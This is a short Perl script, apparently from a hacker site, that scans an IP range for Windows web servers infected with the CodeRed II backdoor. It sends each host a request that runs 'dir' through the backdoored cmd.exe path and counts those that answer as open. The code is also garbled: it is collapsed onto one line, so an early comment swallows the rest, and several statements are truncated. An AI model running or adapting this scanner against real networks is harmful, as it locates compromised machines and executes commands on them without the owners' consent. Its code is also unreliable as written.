#!/usr/bin/perl # CodeRed II Scanner - dorkism # www.dorkism.net @crpath = ("GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n"); @names = ("CodeRed II Backdoor"); $insecure = 0; system "clear"; use IO::Socket; my ($port, $sock,$server); $size=0; if(! $ARGV[0]) { &usage; exit; } $server = $ARGV[0]; ($s,$e) = split(/-/,$server); ($ia,$ib,$id,$ix) = split(/\./,$s); print "[CodeRed II Scanner - dorkism]\n"; print "[Scaning from $s to $ia.$ib.$id.$e]\n"; $port = $ARGV[1]; if(! $ARGV[1]) { $port = 80; } for($i=$ix;$i<=$e;$i++) { $server = "$ia.$ib.$id.$i"; &connect; } sub connect { #print "[Trying $server]\n"; $sock = IO::Socket::INET->new(PeerAddr => $server, PeerPort => $port, Proto => 'tcp'); if ($sock) { print "[Connected to $server on $port]\n"; $n=0; &loopty_loop; close(sock); $size++; } else { } } sub loopty_loop { foreach $crpath(@crpath) { print "Searching for @names[$n] : "; $scw=$crpath; $name = @names[$n]; &cr_scan; $n++; } close(SOCK); } sub cr_scan { my($iaddr,$paddr,$proto); $iaddr = inet_aton($server) || die "Error: $!"; $paddr = sockaddr_in($port, $iaddr) || die "Error: $!"; $proto = getprotobyname('tcp') || die "Error: $!"; socket(SOCK, PF_INET, SOCK_STREAM, $proto) || &error("Failed to open socket: $!"); connect(SOCK, $paddr) || &error("Unable to connect: $!"); send(SOCK,$scw,0); $check=; ($http,$code,$blah) = split(/ /,$check); if($code == 200) { print "[Found!]\n"; $insecure++; } else { print "[Not Found]\n"; } close(SOCK); } ################################ USAGE ########################## sub usage { print "[CodeRed II Scanner - dorkism]\n[Usage: perl cr2_scan.pl -]\n[Example: perl cr2_scan.pl 192.168.1-255]\n"; exit(0); } ################################ END ########################## print "[End Of Scan. Have a good day...]\n";